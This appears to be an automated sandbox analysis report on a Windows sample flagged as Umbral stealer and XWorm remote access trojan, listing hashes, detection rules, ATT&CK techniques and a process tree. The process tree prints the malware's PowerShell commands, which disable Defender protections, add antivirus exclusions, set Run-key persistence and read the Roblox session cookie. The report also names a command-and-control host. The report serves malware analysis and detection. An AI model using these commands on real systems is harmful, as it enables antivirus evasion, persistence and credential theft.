umbral | 932efb570cd8045499675443a910394b5c6bec45511aa2c517a636bd3e385766

Analysis

max time kernel
145s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240221-en
resource tags

arch:x64arch:x86image:win10v2004-20240221-enlocale:en-usos:windows10-2004-x64system
submitted
25-02-2024 06:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

IO tootls.exe
Size

209KB
MD5

841d1c344cc00671b25a80e6db3b1e06
SHA1

1952391bfc777b4cd2acc403d895dd7e198aa013
SHA256

932efb570cd8045499675443a910394b5c6bec45511aa2c517a636bd3e385766
SHA512

75af1637e76c307c6241a4ac26859a9260c2198d2aa83e5a6c52e0ec6bb37fac4cecf4f002f05d861356f833fc306869682e3195c0e6ba603e8ebf4b9a98f96e
SSDEEP

6144:v5DmisKDLvohc1Y3o40bbwhpn8+jPmqSQj33zO9Y:xXLDor440y8oPmZW

Score

10^/10

umbral xworm persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

hai1723rat-60039.portmap.io:60039

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral4/files/0x000900000002321b-63.dat	family_umbral
behavioral4/memory/4036-75-0x00000299738E0000-0x000002997392E000-memory.dmp	family_umbral

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral4/files/0x0008000000023217-40.dat	family_xworm
behavioral4/memory/3112-68-0x0000000000470000-0x0000000000496000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	controllloader.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1414748551-1520717498-2956787782-1000\Control Panel\International\Geo\Nation	IO tootls.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1414748551-1520717498-2956787782-1000\Control Panel\International\Geo\Nation	systemload.exe

Executes dropped EXE 2 IoCs

pid	Process
3112	systemload.exe
4036	controllloader.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1414748551-1520717498-2956787782-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\updatee = "C:\\Windows\\.NET\\netloader.exe"	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
36	discord.com
37	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
26	ip-api.com
32	ip-api.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3280 set thread context of 4924	3280	IO tootls.exe	90

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\.NET\netloader.exe	IO tootls.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3184	wmic.exe

Suspicious behavior: EnumeratesProcesses 46 IoCs

pid	Process
3332	powershell.exe
3332	powershell.exe
4924	IO tootls.exe
4924	IO tootls.exe
4924	IO tootls.exe
4924	IO tootls.exe
4924	IO tootls.exe
4924	IO tootls.exe
4924	IO tootls.exe
4924	IO tootls.exe
4924	IO tootls.exe
4924	IO tootls.exe
4924	IO tootls.exe
4924	IO tootls.exe
4924	IO tootls.exe
4924	IO tootls.exe
4924	IO tootls.exe
4924	IO tootls.exe
4924	IO tootls.exe
4924	IO tootls.exe
4924	IO tootls.exe
4924	IO tootls.exe
4924	IO tootls.exe
2904	powershell.exe
2904	powershell.exe
2904	powershell.exe
1576	powershell.exe
1576	powershell.exe
3076	powershell.exe
3076	powershell.exe
1576	powershell.exe
3076	powershell.exe
896	powershell.exe
896	powershell.exe
896	powershell.exe
5108	powershell.exe
5108	powershell.exe
3504	powershell.exe
3504	powershell.exe
3504	powershell.exe
5108	powershell.exe
3112	systemload.exe
3588	powershell.exe
3588	powershell.exe
4652	powershell.exe
4652	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3332	powershell.exe
Token: SeDebugPrivilege	4924	IO tootls.exe
Token: SeDebugPrivilege	4036	controllloader.exe
Token: SeDebugPrivilege	2904	powershell.exe
Token: SeDebugPrivilege	3112	systemload.exe
Token: SeDebugPrivilege	1576	powershell.exe
Token: SeDebugPrivilege	3076	powershell.exe
Token: SeDebugPrivilege	896	powershell.exe
Token: SeDebugPrivilege	5108	powershell.exe
Token: SeDebugPrivilege	3504	powershell.exe
Token: SeDebugPrivilege	3112	systemload.exe
Token: SeDebugPrivilege	3588	powershell.exe
Token: SeIncreaseQuotaPrivilege	2940	wmic.exe
Token: SeSecurityPrivilege	2940	wmic.exe
Token: SeTakeOwnershipPrivilege	2940	wmic.exe
Token: SeLoadDriverPrivilege	2940	wmic.exe
Token: SeSystemProfilePrivilege	2940	wmic.exe
Token: SeSystemtimePrivilege	2940	wmic.exe
Token: SeProfSingleProcessPrivilege	2940	wmic.exe
Token: SeIncBasePriorityPrivilege	2940	wmic.exe
Token: SeCreatePagefilePrivilege	2940	wmic.exe
Token: SeBackupPrivilege	2940	wmic.exe
Token: SeRestorePrivilege	2940	wmic.exe
Token: SeShutdownPrivilege	2940	wmic.exe
Token: SeDebugPrivilege	2940	wmic.exe
Token: SeSystemEnvironmentPrivilege	2940	wmic.exe
Token: SeRemoteShutdownPrivilege	2940	wmic.exe
Token: SeUndockPrivilege	2940	wmic.exe
Token: SeManageVolumePrivilege	2940	wmic.exe
Token: 33	2940	wmic.exe
Token: 34	2940	wmic.exe
Token: 35	2940	wmic.exe
Token: 36	2940	wmic.exe
Token: SeIncreaseQuotaPrivilege	2940	wmic.exe
Token: SeSecurityPrivilege	2940	wmic.exe
Token: SeTakeOwnershipPrivilege	2940	wmic.exe
Token: SeLoadDriverPrivilege	2940	wmic.exe
Token: SeSystemProfilePrivilege	2940	wmic.exe
Token: SeSystemtimePrivilege	2940	wmic.exe
Token: SeProfSingleProcessPrivilege	2940	wmic.exe
Token: SeIncBasePriorityPrivilege	2940	wmic.exe
Token: SeCreatePagefilePrivilege	2940	wmic.exe
Token: SeBackupPrivilege	2940	wmic.exe
Token: SeRestorePrivilege	2940	wmic.exe
Token: SeShutdownPrivilege	2940	wmic.exe
Token: SeDebugPrivilege	2940	wmic.exe
Token: SeSystemEnvironmentPrivilege	2940	wmic.exe
Token: SeRemoteShutdownPrivilege	2940	wmic.exe
Token: SeUndockPrivilege	2940	wmic.exe
Token: SeManageVolumePrivilege	2940	wmic.exe
Token: 33	2940	wmic.exe
Token: 34	2940	wmic.exe
Token: 35	2940	wmic.exe
Token: 36	2940	wmic.exe
Token: SeIncreaseQuotaPrivilege	2260	wmic.exe
Token: SeSecurityPrivilege	2260	wmic.exe
Token: SeTakeOwnershipPrivilege	2260	wmic.exe
Token: SeLoadDriverPrivilege	2260	wmic.exe
Token: SeSystemProfilePrivilege	2260	wmic.exe
Token: SeSystemtimePrivilege	2260	wmic.exe
Token: SeProfSingleProcessPrivilege	2260	wmic.exe
Token: SeIncBasePriorityPrivilege	2260	wmic.exe
Token: SeCreatePagefilePrivilege	2260	wmic.exe
Token: SeBackupPrivilege	2260	wmic.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3112	systemload.exe

Suspicious use of WriteProcessMemory 43 IoCs

description	pid	Process	procid_target
PID 3280 wrote to memory of 3332	3280	IO tootls.exe	87
PID 3280 wrote to memory of 3332	3280	IO tootls.exe	87
PID 3280 wrote to memory of 3332	3280	IO tootls.exe	87
PID 3280 wrote to memory of 4924	3280	IO tootls.exe	90
PID 3280 wrote to memory of 4924	3280	IO tootls.exe	90
PID 3280 wrote to memory of 4924	3280	IO tootls.exe	90
PID 3280 wrote to memory of 4924	3280	IO tootls.exe	90
PID 3280 wrote to memory of 4924	3280	IO tootls.exe	90
PID 3280 wrote to memory of 4924	3280	IO tootls.exe	90
PID 3280 wrote to memory of 4924	3280	IO tootls.exe	90
PID 3280 wrote to memory of 4924	3280	IO tootls.exe	90
PID 4924 wrote to memory of 3112	4924	IO tootls.exe	94
PID 4924 wrote to memory of 3112	4924	IO tootls.exe	94
PID 4924 wrote to memory of 4036	4924	IO tootls.exe	95
PID 4924 wrote to memory of 4036	4924	IO tootls.exe	95
PID 4924 wrote to memory of 2384	4924	IO tootls.exe	96
PID 4924 wrote to memory of 2384	4924	IO tootls.exe	96
PID 4924 wrote to memory of 2384	4924	IO tootls.exe	96
PID 2384 wrote to memory of 2904	2384	cmd.exe	98
PID 2384 wrote to memory of 2904	2384	cmd.exe	98
PID 2384 wrote to memory of 2904	2384	cmd.exe	98
PID 4036 wrote to memory of 1576	4036	controllloader.exe	99
PID 4036 wrote to memory of 1576	4036	controllloader.exe	99
PID 3112 wrote to memory of 3076	3112	systemload.exe	101
PID 3112 wrote to memory of 3076	3112	systemload.exe	101
PID 4036 wrote to memory of 896	4036	controllloader.exe	103
PID 4036 wrote to memory of 896	4036	controllloader.exe	103
PID 3112 wrote to memory of 5108	3112	systemload.exe	105
PID 3112 wrote to memory of 5108	3112	systemload.exe	105
PID 4036 wrote to memory of 3504	4036	controllloader.exe	107
PID 4036 wrote to memory of 3504	4036	controllloader.exe	107
PID 4036 wrote to memory of 3588	4036	controllloader.exe	109
PID 4036 wrote to memory of 3588	4036	controllloader.exe	109
PID 4036 wrote to memory of 2940	4036	controllloader.exe	111
PID 4036 wrote to memory of 2940	4036	controllloader.exe	111
PID 4036 wrote to memory of 2260	4036	controllloader.exe	113
PID 4036 wrote to memory of 2260	4036	controllloader.exe	113
PID 4036 wrote to memory of 4696	4036	controllloader.exe	115
PID 4036 wrote to memory of 4696	4036	controllloader.exe	115
PID 4036 wrote to memory of 4652	4036	controllloader.exe	117
PID 4036 wrote to memory of 4652	4036	controllloader.exe	117
PID 4036 wrote to memory of 3184	4036	controllloader.exe	119
PID 4036 wrote to memory of 3184	4036	controllloader.exe	119

C:\Users\Admin\AppData\Local\Temp\IO tootls.exe
"C:\Users\Admin\AppData\Local\Temp\IO tootls.exe"
1⤵
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3280
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'updatee';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'updatee' -Value '"C:\Windows\.NET\netloader.exe"' -PropertyType 'String'
  2⤵
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3332
- C:\Users\Admin\AppData\Local\Temp\IO tootls.exe
  #cmd
  2⤵
  - Checks computer location settings
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4924
- - C:\Users\Admin\AppData\Local\Temp\systemload.exe
    "C:\Users\Admin\AppData\Local\Temp\systemload.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3112
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\systemload.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3076
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'systemload.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5108
- - C:\Users\Admin\AppData\Local\Temp\controllloader.exe
    "C:\Users\Admin\AppData\Local\Temp\controllloader.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4036
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\controllloader.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1576
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:896
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3504
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3588
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2940
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2260
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:4696
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4652
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3184
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\start.cmd" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2384
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\'"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2904

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\IO tootls.exe.log

Filesize
321B

MD5
baf5d1398fdb79e947b60fe51e45397f

SHA1
49e7b8389f47b93509d621b8030b75e96bb577af

SHA256
10c8c7b5fa58f8c6b69f44e92a4e2af111b59fcf4f21a07e04b19e14876ccdf8

SHA512
b2c9ef5581d5eae7c17ae260fe9f52344ed737fa851cb44d1cea58a32359d0ac5d0ca3099c970209bd30a0d4af6e504101f21b7054cf5eca91c0831cf12fb413

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9faf6f9cd1992cdebfd8e34b48ea9330

SHA1
ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e

SHA256
0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953

SHA512
05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
bd5940f08d0be56e65e5f2aaf47c538e

SHA1
d7e31b87866e5e383ab5499da64aba50f03e8443

SHA256
2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

SHA512
c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e8ce785f8ccc6d202d56fefc59764945

SHA1
ca032c62ddc5e0f26d84eff9895eb87f14e15960

SHA256
d85c19fc6b9d25e2168a2cc50ff38bd226fbf4f02aa7ac038a5f319522d2ffa4

SHA512
66460aec4afee582556270f8ee6048d130a090f1c12a2632ed71a99a4073e9931e9e1cc286e32debffb95a90bd955f0f0d6ec891b1c5cd2f0aae41eb6d25832f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
f4bf3ca8753d6bb9725419fec1ec74b9

SHA1
71fce9d17d1d92873236a9a827c52eb9e4827f3d

SHA256
ca8697e4ada4c3d4aac2899b8aad4052ccd605fccee05ee0a831368bde2f7417

SHA512
a55a107ae8bcf833ea674413c765cd55096146c9634dff41884fcc851c12fe47753308099525c99ae44883facfb668c8b292dd915263f34ebd1190391cb28a54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
cfad038593302a5b31ca2ee9e78a8f63

SHA1
46f94dc1775dd09146d2d2a1b21525c9bdbd6164

SHA256
78dfdd1f5d7b854e9372cc6999bd60539cac1a7346dae8094706f77484f825e7

SHA512
f8f1d9b10a99d6f90ade687d851ff1e6ddb25eb7b058fa954f71c0301286dc4c34b85cde3e2b0a07d6bb7a8b8c9ad8abb1ad69032db90813e77c7b016588a644

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
0843fbe22e22e756548ce4164de8f248

SHA1
4b8959fd6fb0094e89dd79544b7f2be06070d8de

SHA256
694ffce1662f591db1068df744f48ec9c507e68934c3f98368eb177b487ad2d7

SHA512
3f95a45b9a07d09c56316d2a83a2fdf69f5c46060a1bdb6bbb4c360055c2d411ec1d28c045c30d0e192788ae3d6a681c5baefd656b39c877203f7feb17c5d479

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3c62d05bb8d8ab1338fae83706b0faf0

SHA1
cc354d389150dd3801183995a1ae66976d8a66e4

SHA256
5785d1b0743c2717327a426268f924f681badbd624146834a6ce81ad95c342b4

SHA512
f17bb3b734cb828eceef2e6e90ab6c0096a03d2b9c129b1a216ff1f179768a41fa528df9f97d75759b978a5bd539823f7a65bb8efb20e92415d696cb8f9bc489

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b40ubtd4.m14.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\controllloader.exe

Filesize
286KB

MD5
e41a0fa0c1e39af92d22090d4df61a1f

SHA1
c971a4089b1ab116c34b5ab0dc54d9977f86e834

SHA256
c0966533c2bc8c8b9ee176d774eae0ca1c4d6fe6e8efe5d87d4cac8c04b84372

SHA512
d42798fa9115f3c3775798a26ef7c28e4f173bdc2b74884b01a4e7905b17a2da09508766a626652eec3622a15a891b6859f4e9a422eb052a59b3fd3eafe1a7fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\start.cmd

Filesize
93B

MD5
f960abd9684a879e8eca03b8c864ea96

SHA1
fb4b9a9b40af84ae46b70bb40ac3e1f45e4b4ad3

SHA256
7389178da21f4e2d4ef73ab199b7beeb97247a6c1afec3f3c48a7f561cbfaf90

SHA512
2c6267ab25c364c5b13059ed593bb47dfae586ae7b1411634efa3f45aaf07b4d8f491fe93bfd34482a1250c955f1e8c27e1afa0460672a5e9584ebe007ab2054

Download Submit
C:\Users\Admin\AppData\Local\Temp\systemload.exe

Filesize
130KB

MD5
352a162df9ca5605e1a1910c7a24cb7c

SHA1
4b4ed1c740a03c15eb47d875b65c76941debcaf7

SHA256
87e9d9a7a197a0cd483f8e73f307af53a7518cabc001257c8235743181b9a7b8

SHA512
0c2bae3f66748cc3448eaf60c5079ae3afba6d585e19e54857f7c152a1bd69c3b8e3df7feb413f3eb2df0f2bc01b44be5bcdefd5427af154a221f2b808a2399d

Download Submit
memory/896-153-0x000001EEDA910000-0x000001EEDA920000-memory.dmp

Filesize
64KB

Download
memory/896-152-0x00007FFA199A0000-0x00007FFA1A461000-memory.dmp

Filesize
10.8MB

Download
memory/1576-100-0x000002339D790000-0x000002339D7A0000-memory.dmp

Filesize
64KB

Download
memory/1576-102-0x00000233B5ED0000-0x00000233B5EF2000-memory.dmp

Filesize
136KB

Download
memory/1576-149-0x00007FFA199A0000-0x00007FFA1A461000-memory.dmp

Filesize
10.8MB

Download
memory/1576-99-0x00007FFA199A0000-0x00007FFA1A461000-memory.dmp

Filesize
10.8MB

Download
memory/1576-143-0x000002339D790000-0x000002339D7A0000-memory.dmp

Filesize
64KB

Download
memory/1576-101-0x000002339D790000-0x000002339D7A0000-memory.dmp

Filesize
64KB

Download
memory/2904-88-0x0000000004990000-0x00000000049A0000-memory.dmp

Filesize
64KB

Download
memory/2904-131-0x00000000703E0000-0x000000007042C000-memory.dmp

Filesize
304KB

Download
memory/2904-87-0x0000000004990000-0x00000000049A0000-memory.dmp

Filesize
64KB

Download
memory/2904-86-0x00000000745C0000-0x0000000074D70000-memory.dmp

Filesize
7.7MB

Download
memory/3076-142-0x0000026299950000-0x0000026299960000-memory.dmp

Filesize
64KB

Download
memory/3076-115-0x00007FFA199A0000-0x00007FFA1A461000-memory.dmp

Filesize
10.8MB

Download
memory/3076-116-0x0000026299950000-0x0000026299960000-memory.dmp

Filesize
64KB

Download
memory/3112-141-0x00007FFA199A0000-0x00007FFA1A461000-memory.dmp

Filesize
10.8MB

Download
memory/3112-68-0x0000000000470000-0x0000000000496000-memory.dmp

Filesize
152KB

Download
memory/3112-79-0x00007FFA199A0000-0x00007FFA1A461000-memory.dmp

Filesize
10.8MB

Download
memory/3280-2-0x0000000004F70000-0x0000000005514000-memory.dmp

Filesize
5.6MB

Download
memory/3280-10-0x00000000745C0000-0x0000000074D70000-memory.dmp

Filesize
7.7MB

Download
memory/3280-0-0x00000000745C0000-0x0000000074D70000-memory.dmp

Filesize
7.7MB

Download
memory/3280-4-0x0000000004AA0000-0x0000000004AB0000-memory.dmp

Filesize
64KB

Download
memory/3280-1-0x0000000000010000-0x000000000004A000-memory.dmp

Filesize
232KB

Download
memory/3332-83-0x0000000006DE0000-0x0000000006DEA000-memory.dmp

Filesize
40KB

Download
memory/3332-129-0x0000000007090000-0x0000000007098000-memory.dmp

Filesize
32KB

Download
memory/3332-6-0x0000000002130000-0x0000000002166000-memory.dmp

Filesize
216KB

Download
memory/3332-78-0x0000000006D70000-0x0000000006D8A000-memory.dmp

Filesize
104KB

Download
memory/3332-85-0x0000000006FF0000-0x0000000007086000-memory.dmp

Filesize
600KB

Download
memory/3332-9-0x00000000745C0000-0x0000000074D70000-memory.dmp

Filesize
7.7MB

Download
memory/3332-77-0x00000000073B0000-0x0000000007A2A000-memory.dmp

Filesize
6.5MB

Download
memory/3332-12-0x0000000004B90000-0x00000000051B8000-memory.dmp

Filesize
6.2MB

Download
memory/3332-98-0x0000000006F70000-0x0000000006F81000-memory.dmp

Filesize
68KB

Download
memory/3332-55-0x0000000006C40000-0x0000000006CE3000-memory.dmp

Filesize
652KB

Download
memory/3332-54-0x0000000006010000-0x000000000602E000-memory.dmp

Filesize
120KB

Download
memory/3332-39-0x00000000703E0000-0x000000007042C000-memory.dmp

Filesize
304KB

Download
memory/3332-35-0x0000000006030000-0x0000000006062000-memory.dmp

Filesize
200KB

Download
memory/3332-112-0x00000000745C0000-0x0000000074D70000-memory.dmp

Filesize
7.7MB

Download
memory/3332-114-0x0000000006FA0000-0x0000000006FAE000-memory.dmp

Filesize
56KB

Download
memory/3332-113-0x0000000002120000-0x0000000002130000-memory.dmp

Filesize
64KB

Download
memory/3332-36-0x000000007FD80000-0x000000007FD90000-memory.dmp

Filesize
64KB

Download
memory/3332-34-0x0000000002120000-0x0000000002130000-memory.dmp

Filesize
64KB

Download
memory/3332-117-0x0000000002120000-0x0000000002130000-memory.dmp

Filesize
64KB

Download
memory/3332-123-0x0000000006FB0000-0x0000000006FC4000-memory.dmp

Filesize
80KB

Download
memory/3332-128-0x00000000070B0000-0x00000000070CA000-memory.dmp

Filesize
104KB

Download
memory/3332-11-0x0000000002120000-0x0000000002130000-memory.dmp

Filesize
64KB

Download
memory/3332-130-0x0000000002120000-0x0000000002130000-memory.dmp

Filesize
64KB

Download
memory/3332-16-0x0000000002120000-0x0000000002130000-memory.dmp

Filesize
64KB

Download
memory/3332-30-0x0000000005AA0000-0x0000000005AEC000-memory.dmp

Filesize
304KB

Download
memory/3332-29-0x0000000005A60000-0x0000000005A7E000-memory.dmp

Filesize
120KB

Download
memory/3332-28-0x0000000005680000-0x00000000059D4000-memory.dmp

Filesize
3.3MB

Download
memory/3332-144-0x000000007FD80000-0x000000007FD90000-memory.dmp

Filesize
64KB

Download
memory/3332-15-0x0000000004980000-0x00000000049A2000-memory.dmp

Filesize
136KB

Download
memory/3332-146-0x00000000070D0000-0x00000000070F2000-memory.dmp

Filesize
136KB

Download
memory/3332-18-0x0000000005410000-0x0000000005476000-memory.dmp

Filesize
408KB

Download
memory/3332-17-0x00000000053A0000-0x0000000005406000-memory.dmp

Filesize
408KB

Download
memory/4036-151-0x00007FFA199A0000-0x00007FFA1A461000-memory.dmp

Filesize
10.8MB

Download
memory/4036-145-0x0000029975F70000-0x0000029975F80000-memory.dmp

Filesize
64KB

Download
memory/4036-82-0x00007FFA199A0000-0x00007FFA1A461000-memory.dmp

Filesize
10.8MB

Download
memory/4036-75-0x00000299738E0000-0x000002997392E000-memory.dmp

Filesize
312KB

Download
memory/4036-80-0x0000029975F70000-0x0000029975F80000-memory.dmp

Filesize
64KB

Download
memory/4924-31-0x00000000054E0000-0x00000000054F0000-memory.dmp

Filesize
64KB

Download
memory/4924-14-0x00000000745C0000-0x0000000074D70000-memory.dmp

Filesize
7.7MB

Download
memory/4924-13-0x0000000005290000-0x000000000532C000-memory.dmp

Filesize
624KB

Download
memory/4924-5-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/4924-81-0x00000000745C0000-0x0000000074D70000-memory.dmp

Filesize
7.7MB

Download